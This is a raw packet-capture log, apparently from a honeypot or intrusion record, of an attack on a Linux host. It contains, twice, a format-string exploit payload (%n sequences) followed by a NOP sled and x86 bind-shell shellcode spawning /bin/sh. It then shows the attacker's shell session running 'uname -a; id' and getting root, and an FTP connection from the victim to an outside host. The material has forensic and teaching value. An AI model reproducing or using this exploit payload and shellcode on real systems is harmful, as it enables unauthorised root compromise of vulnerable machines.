00 00 00 00 t............... 00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF ................ 18 F7 FF BF 19 F7 FF BF 19 F7 FF BF 1A F7 FF BF ................ 1A F7 FF BF 1B F7 FF BF 1B F7 FF BF 25 38 78 25 ............%8x% 38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x%8x%8x%8 78 25 38 78 25 38 78 25 32 33 36 78 25 6E 25 31 x%8x%8x%236x%n%1 33 37 78 25 6E 25 31 30 78 25 6E 25 31 39 32 78 37x%n%10x%n%192x 25 6E 90 90 90 90 90 90 90 90 90 90 90 90 90 90 %n.............. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0 ..............1. EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3 .|Y.A..A....A... FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E .....f.....Y..A. 99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66 ..A...I..A.....f CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0 .....f....0..A.. 66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0 f......1..?..... 3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7 ?.....?..../bin. 46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56 F./shA0..F..v..V 10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F ..N............. FF FF FF 00 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:21:29.303241 211.185.125.124:791 -> 172.16.1.108:931 UDP TTL:43 TOS:0x0 ID:30708 IpLen:20 DgmLen:1104 Len: 1084 1A CF 13 BC 00 00 00 00 00 00 00 02 00 01 86 B8 ................ 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ............... 3A B1 5E E5 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :.^.....localhos 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t............... 00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF ................ 18 F7 FF BF 19 F7 FF BF 19 F7 FF BF 1A F7 FF BF ................ 1A F7 FF BF 1B F7 FF BF 1B F7 FF BF 25 38 78 25 ............%8x% 38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x%8x%8x%8 78 25 38 78 25 38 78 25 32 33 36 78 25 6E 25 31 x%8x%8x%236x%n%1 33 37 78 25 6E 25 31 30 78 25 6E 25 31 39 32 78 37x%n%10x%n%192x 25 6E 90 90 90 90 90 90 90 90 90 90 90 90 90 90 %n.............. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0 ..............1. EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3 .|Y.A..A....A... FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E .....f.....Y..A. 99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66 ..A...I..A.....f CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0 .....f....0..A.. 66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0 f......1..?..... 3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7 ?.....?..../bin. 46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56 F./shA0..F..v..V 10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F ..N............. FF FF FF 00 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:21:36.312515 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:31657 IpLen:20 DgmLen:60 DF ******S* Seq: 0x9C6D2BFE Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 23679855 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:21:36.313896 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:75 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0x59606332 Ack: 0x9C6D2BFF Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 2880015 23679855 NOP TCP Options => WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:21:36.538332 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:31659 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2BFF Ack: 0x59606333 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23679878 2880015 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:21:36.539731 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:31660 IpLen:20 DgmLen:71 DF ***AP*** Seq: 0x9C6D2BFF Ack: 0x59606333 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23679878 2880015 63 64 20 2F 3B 20 75 6E 61 6D 65 20 2D 61 3B 20 cd /; uname -a; 69 64 3B id; =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:21:36.540995 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:76 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x59606333 Ack: 0x9C6D2C12 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2880038 23679878 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:24:27.288446 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:34661 IpLen:20 DgmLen:53 DF ***AP*** Seq: 0x9C6D2C12 Ack: 0x59606333 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23696953 2880038 0A . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:24:27.307094 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:77 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x59606333 Ack: 0x9C6D2C13 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2897114 23696953 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:24:27.316025 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:78 IpLen:20 DgmLen:119 DF ***AP*** Seq: 0x59606333 Ack: 0x9C6D2C13 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2897115 23696953 4C 69 6E 75 78 20 61 73 64 66 31 20 32 2E 32 2E Linux asdf1 2.2. 31 34 2D 35 2E 30 20 23 31 20 54 75 65 20 4D 61 14-5.0 #1 Tue Ma 72 20 37 20 32 30 3A 35 33 3A 34 31 20 45 53 54 r 7 20:53:41 EST 20 32 30 30 30 20 69 35 38 36 20 75 6E 6B 6E 6F 2000 i586 unkno 77 6E 0A wn. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:24:27.550777 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:34664 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2C13 Ack: 0x59606376 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23696979 2897115 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:24:27.552084 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:79 IpLen:20 DgmLen:76 DF ***AP*** Seq: 0x59606376 Ack: 0x9C6D2C13 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2897138 23696979 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69 64 3D uid=0(root) gid= 30 28 72 6F 6F 74 29 0A 0(root). =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:24:27.817717 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:34666 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2C13 Ack: 0x5960638E Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23697004 2897138 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:04.432505 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:25564 IpLen:20 DgmLen:71 DF ***AP*** Seq: 0x9C6D2C13 Ack: 0x5960638E Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23766667 2897138 66 74 70 20 2D 76 20 66 74 70 2E 68 6F 6D 65 2E ftp -v ftp.home. 72 6F 0A ro. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:04.445658 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:80 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x5960638E Ack: 0x9C6D2C26 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2966825 23766667 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:04.694845 172.16.1.108:1026 -> 193.231.236.41:21 TCP TTL:63 TOS:0x0 ID:82 IpLen:20 DgmLen:60 DF ******S* Seq: 0x903AE7E3 Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 2966849 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:04.885203 193.231.236.41:21 -> 172.16.1.108:1026 TCP TTL:34 TOS:0x0 ID:41928 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0x99F959F8 Ack: 0x903AE7E4 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 14797487 2966849 NOP TCP Options => WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:04.886722 172.16.1.108:1026 -> 193.231.236.41:21 TCP TTL:63 TOS:0x0 ID:83 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x903AE7E4 Ack: 0x99F959F9 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2966869 14797487 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:05.086302 193.231.236.41:1516 -> 172.16.1.108:113 TCP TTL:34 TOS:0x0 ID:41954 IpLen:20 DgmLen:60 DF ******S* Seq: 0x9ABBAD92 Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 14797507 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:05.087787 172.16.1.108:113 -> 193.231.236.41:1516 TCP TTL:63 TOS:0x0 ID:84 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0x9061ACB7 Ack: 0x9ABBAD93 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 2966889 14797507 NOP TCP Options => WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:05.279279 193.231.236.41:1516 -> 172.16.1.108:113 TCP TTL:34 TOS:0x0 ID:41988 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9ABBAD93 Ack: 0x9061ACB8 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14797526 2966889 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:05.280621 193.231.236.41:1516 -> 172.16.1.108:113 TCP TTL:34 TOS:0x0 ID:41989 IpLen:20 DgmLen:61 DF ***AP*** Seq: 0x9ABBAD93 Ack: 0x9061ACB8 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14797526 2966889 31 30 32 36 2C 32 31 0D 0A 1026,21.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:05.282135 172.16.1.108:113 -> 193.231.236.41:1516 TCP TTL:63 TOS:0x0 ID:85 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9061ACB8 Ack: 0x9ABBAD9C Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2966908 14797526 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:05.413082 172.16.1.108:113 -> 193.231.236.41:1516 TCP TTL:63 TOS:0x0 ID:86 IpLen:20 DgmLen:86 DF ***AP*** Seq: 0x9061ACB8 Ack: 0x9ABBAD9C Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2966921 14797526 31 30 32 36 20 2C 20 32 31 20 3A 20 55 53 45 52 1026 , 21 : USER 49 44 20 3A 20 4F 54 48 45 52 20 3A 72 6F 6F 74 ID : OTHER :root 0D 0A .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:05.703065 193.231.236.41:1516 -> 172.16.1.108:113 TCP TTL:34 TOS:0x0 ID:42027 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9ABBAD9C Ack: 0x9061ACDA Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14797559 2966921 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:05.704315 193.231.236.41:1516 -> 172.16.1.108:113 TCP TTL:34 TOS:0x0 ID:42028 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9ABBAD9C Ack: 0x9061ACDA Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14797559 2966921 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:05.705537 172.16.1.108:113 -> 193.231.236.41:1516 TCP TTL:63 TOS:0x0 ID:87 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9061ACDA Ack: 0x9ABBAD9D Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2966950 14797559 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:05.705878 172.16.1.108:113 -> 193.231.236.41:1516 TCP TTL:63 TOS:0x0 ID:88 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9061ACDA Ack: 0x9ABBAD9D Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2966951 14797559 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:05.898582 193.231.236.41:1516 -> 172.16.1.108:113 TCP TTL:34 TOS:0x0 ID:42069 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9ABBAD9D Ack: 0x9061ACDB Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14797589 2966951 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.088458 193.231.236.41:1519 -> 172.16.1.108:113 TCP TTL:34 TOS:0x0 ID:42249 IpLen:20 DgmLen:60 DF ******S* Seq: 0x9AEAA23C Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 14797707 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.089803 172.16.1.108:113 -> 193.231.236.41:1519 TCP TTL:63 TOS:0x0 ID:89 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0x90385273 Ack: 0x9AEAA23D Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 2967089 14797707 NOP TCP Options => WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.272856 193.231.236.41:1519 -> 172.16.1.108:113 TCP TTL:34 TOS:0x0 ID:42302 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9AEAA23D Ack: 0x90385274 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14797726 2967089 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.274285 193.231.236.41:1519 -> 172.16.1.108:113 TCP TTL:34 TOS:0x0 ID:42303 IpLen:20 DgmLen:63 DF ***AP*** Seq: 0x9AEAA23D Ack: 0x90385274 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14797726 2967089 31 30 32 36 20 2C 20 32 31 0D 0A 1026 , 21.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.275552 172.16.1.108:113 -> 193.231.236.41:1519 TCP TTL:63 TOS:0x0 ID:90 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x90385274 Ack: 0x9AEAA248 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2967107 14797726 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.276891 172.16.1.108:113 -> 193.231.236.41:1519 TCP TTL:63 TOS:0x0 ID:91 IpLen:20 DgmLen:86 DF ***AP*** Seq: 0x90385274 Ack: 0x9AEAA248 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2967108 14797726 31 30 32 36 20 2C 20 32 31 20 3A 20 55 53 45 52 1026 , 21 : USER 49 44 20 3A 20 4F 54 48 45 52 20 3A 72 6F 6F 74 ID : OTHER :root 0D 0A .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.481188 193.231.236.41:1519 -> 172.16.1.108:113 TCP TTL:34 TOS:0x0 ID:42342 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9AEAA248 Ack: 0x90385296 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14797747 2967108 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.482476 193.231.236.41:1519 -> 172.16.1.108:113 TCP TTL:34 TOS:0x0 ID:42343 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9AEAA248 Ack: 0x90385296 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14797747 2967108 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.483648 172.16.1.108:113 -> 193.231.236.41:1519 TCP TTL:63 TOS:0x0 ID:92 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x90385296 Ack: 0x9AEAA249 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2967128 14797747 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.484061 172.16.1.108:113 -> 193.231.236.41:1519 TCP TTL:63 TOS:0x0 ID:93 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x90385296 Ack: 0x9AEAA249 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2967128 14797747 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.504259 193.231.236.41:1522 -> 172.16.1.108:113 TCP TTL:34 TOS:0x0 ID:42345 IpLen:20 DgmLen:60 DF ******S* Seq: 0x9A7C6791 Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 14797749 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.505672 172.16.1.108:113 -> 193.231.236.41:1522 TCP TTL:63 TOS:0x0 ID:94 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0x906C3BFD Ack: 0x9A7C6792 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 2967130 14797749 NOP TCP Options => WS: 0 